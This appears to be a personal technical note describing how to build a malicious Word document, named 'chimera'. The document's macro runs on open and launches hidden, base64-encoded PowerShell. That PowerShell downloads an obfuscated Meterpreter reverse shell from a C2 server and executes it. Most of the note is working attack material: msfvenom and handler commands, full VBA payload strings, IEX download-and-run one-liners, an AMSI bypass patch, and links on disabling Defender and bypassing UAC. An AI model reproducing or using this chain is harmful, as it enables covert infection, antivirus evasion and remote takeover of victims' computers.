chimera building

--- title: chimera building tag: chimera --- ###### tags: `Chimera` [TOC] # chimera flow 利用呼叫powershell方式將shellcode存放至記憶體中後執行 ## A flow - 開啟msfconsole的multi/handler監聽 - 利用metasploit產生呼叫powershell的vba code ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f vba-psh > vba_psh.ps1 ``` - word vba code ```= Function h0jn6l4K9HOc() Dim ywi6v3 ywi6v3 = "powershell.exe -nop -w hidden -e aQ...A" _ & "cwBlAHs...4Ab" _ & "wBwACAAL...yAGUAcwBzAGkAbw" _ & "BuAC4ARwB6...YAVwBiAFcAKwB" _ & "qAFIA...BIAFIAMgBFADcAdABp" _ : : & "G0ALgBJA...QAYQBuAG" _ & "QAYQByAG...AkAHM" _ & "AKQA7AA==" Call Shell(ywi6v3, vbHide) End Function Sub Document_Open() h0jn6l4K9HOc End Sub ``` > https://gist.github.com/mgeeky/9dee0ac86c65cdd9cb5a2f64cef51991 ## B flow - 開啟msfconsole的multi/handler監聽 - 利用metasploit產生ps1反連執行腳本`pshell.ps1` ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f psh > pshell.ps1 ``` - 利用`xencrypt`混淆產生腳本`chimera.ps1`後將`"`全部替換成`'`並放置於C2端 ```= Import-Module .\xencrypt.ps1 Invoke-Xencrypt -InFile C:\Users\astroicers\Desktop\chimera\pshell.ps1 -OutFile C:\Users\astroicers\Desktop\chimera\chimera.ps1 ``` - 利用powershell版本的base64將需要執行的指令編碼 ``` IEX(New-Object Net.WebClient).DownloadString('http://192.168.100.155:8000/chimera.ps1');sleep 9999 ``` - 將編碼後的指令替換`{{base64_code}}`於powershell的腳本中 ```= if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'}; $s=New-Object System.Diagnostics.ProcessStartInfo; $s.FileName=$b; $s.Arguments='-nop -w hidden -e {{base64_code}}'; $s.UseShellExecute=$false; $s.RedirectStandardOutput=$true; $s.WindowStyle='Hidden'; $s.CreateNoWindow=$true; $p=[System.Diagnostics.Process]::Start($s); ``` - 將上述的腳本再以powershell版本的base64編碼並分割長度後放入vba code中(由於vba的程式碼一行最多1024個字元) ```= Function h0jn6l4K9HOc() Dim ywi6v3 ywi6v3 = "powershell.exe -nop -w hidden -e " _ & "aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4" _ & "AGUAJwB9ADsADQAKACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwANAAoAJABzAC4ARgBpAGwAZQBOAGEAbQBlAD0AJABiADsADQAKACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGUAIABTAFEAQgBGAEEA" _ & "RgBnAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAFQAZwBCAGwAQQBIAFEAQQBMAGcAQgBYAEEARwBVAEEAWQBnAEIARABBAEcAdwBBAGEAUQBCAGwAQQBHADQAQQBkAEEAQQBwAEEAQwA0AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBD" _ & "AGcAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAZwBBAEwAZwBBAHgAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEAMQBBAEQAbwBBAE8AQQBBAHcAQQBEAEEAQQBNAEEAQQB2AEEARwBNAEEAYQBBAEIAcABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBMAGcAQgB3AEEASABNAEEATQBRAEEAbgBBAEMA" _ & "awBBAE8AdwBCAHoAQQBHAHcAQQBaAFEAQgBsAEEASABBAEEASQBBAEEANQBBAEQAawBBAE8AUQBBADUAQQBBAD0APQAnADsADQAKACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwANAAoAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7AA0ACgAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBs" _ & "AGUAPQAnAEgAaQBkAGQAZQBuACcAOwANAAoAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsADQAKACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA" Call Shell(ywi6v3, vbHide) End Function Sub Document_Open() h0jn6l4K9HOc End Sub ``` ## C flow 這個版本大致上就是將`B flow`加上Bypass AMSI的機制 ### kali - msfconsole command ```= use exploit/multi/handler set encoder x64/xor_dynamic set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 7777 set ExitOnSession false exploit -j -z ``` - C2 server(http) ```= python3 -m http.server ``` - msfvenom command ```= msfvenom --encoder x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f psh > pshell.ps1 ``` - xencrypt ```shell= Import-Module .\xencrypt.ps1 Invoke-Xencrypt -InFile C:\Users\astroicers\Desktop\chimera\pshell.ps1 -OutFile C:\Users\astroicers\Desktop\chimera\chimera.ps1 ``` > https://github.com/the-xentropy/xencrypt - Add `chimera.ps1` after `bypass_amsi.ps1` ```= $Win32 = @" using System; ... using System.Runtime.InteropServices; [System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, $Patch.Length) ``` > https://github.com/astroicers/ToolForHack/tree/main/powershell/bypass_amsi/dll_hijack - payload `chimera.ps1` under C2 ### windows - wanted execute command with powershell ```= IEX(New-Object Net.WebClient).DownloadString('http://192.168.100.155:8000/chimera.ps1');sleep 9999 ``` use [powershell base64](#powershell-base64-encodedecode) convert ```= SQBFAFgA...A5ADkAOQA5AA== ``` ```= if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'}; $s=New-Object System.Diagnostics.ProcessStartInfo; $s.FileName=$b; $s.Arguments='-nop -w hidden -e SQBFAFgA...A5ADkAOQA5AA=='; $s.UseShellExecute=$false; $s.RedirectStandardOutput=$true; $s.WindowStyle='Hidden'; $s.CreateNoWindow=$true; $p=[System.Diagnostics.Process]::Start($s); ``` use [powershell base64](#powershell-base64-encodedecode) convert ```= aQBmACgAWwBJ...DQAKAA== ``` - vba code > P.S. vba can only accept the number of characters below 1024 in a single line ```= Function h0jn6l4K9H() Dim ywi6v3dd ywi6v3dd = "powershell.exe -nop -w hidden -e " _ & "aQBmACgAWwBJ..." _ & "..." _ & "..." _ & "..." _ & "..." _ & "...DQAKAA==" Call Shell(ywi6v3dd, vbHide) End Function Sub Document_Open() h0jn6l4K9H End Sub ``` # setting ## macro setting - 開啟word[開發人員]選項 - 進入[Visual Basic] - 編輯區塊[Normal] - 由於開啟即啟動故使用函數[Document_Open()] > https://wordmvp.com/FAQs/MacrosVBA/DocumentEvents.htm ## powershell setting - 設定powershell為可執行腳本 > ![](https://i.imgur.com/HXxRGdk.png) > https://hsiangfeng.github.io/other/20200510/1067127387/ - 利用metasploit建立ps1腳本 ```shell= msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f psh > pshell.ps1 ``` > https://netsec.ws/?p=331 - 利用`xencrypt`網路開源專案混淆 ```shell= Import-Module .\xencrypt.ps1 Invoke-Xencrypt -InFile C:\Users\astroicers\Desktop\chimera\pshell.ps1 -OutFile C:\Users\astroicers\Desktop\chimera\chimera.ps1 ``` >https://github.com/the-xentropy/xencrypt ## remote execute ps1 file ```shell= IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.155:8000/chimera.ps1") powershell -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.100.155:8000/chimera.ps1');sleep 9999" powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADAAMAAuADEANQA1ADoAOAAwADAAMAAvAGMAaABpAG0AZQByAGEALgBwAHMAMQAnACkAOwBzAGwAZQBlAHAAIAA5ADkAOQA5AA== powershell -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADAAMAAuADEANQA1ADoAOAAwADAAMAAvAGMAaABpAG0AZQByAGEALgBwAHMAMQAnACkAOwBzAGwAZQBlAHAAIAA5ADkAOQA5AA== ``` ## powershell base64 encode/decode - https://raikia.com/tool-powershell-encoder/ ## turn off windows defender - [disable windwos defender](https://www.itechtics.com/enable-disable-windows-defender/) - [use kernel bug bypass uac](https://www.twblogs.net/a/5b8ec52f2b71771883479c36) - [run powershell with admin](https://stackoverflow.com/questions/7690994/running-a-command-as-administrator-using-powershell) - [powershell bypass uac](https://evi1cg.me/archives/Powershell_Bypass_UAC.html) - [bypass uac](https://cloud.tencent.com/developer/article/1623517) - [mimikatz win10 error](https://github.com/mitre/caldera/issues/38) # refer - [macro execute powershell by metasploit reverse http payload](https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack/empire-macro) - [Various-Macro-Based-RCE](https://gist.github.com/mgeeky/9dee0ac86c65cdd9cb5a2f64cef51991) - [create shell process](https://docs.microsoft.com/zh-tw/office/vba/access/concepts/windows-api/determine-when-a-shelled-process-ends) - [powershell程式碼混淆繞過](https://iter01.com/512458.html) - [amsi bypass powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) - [開啟windows執行powershell函數](https://hsiangfeng.github.io/other/20200510/1067127387/) - [bypass amsi dll](http://cn33liz.blogspot.com/2016/05/bypassing-amsi-using-powershell-5-dll.html)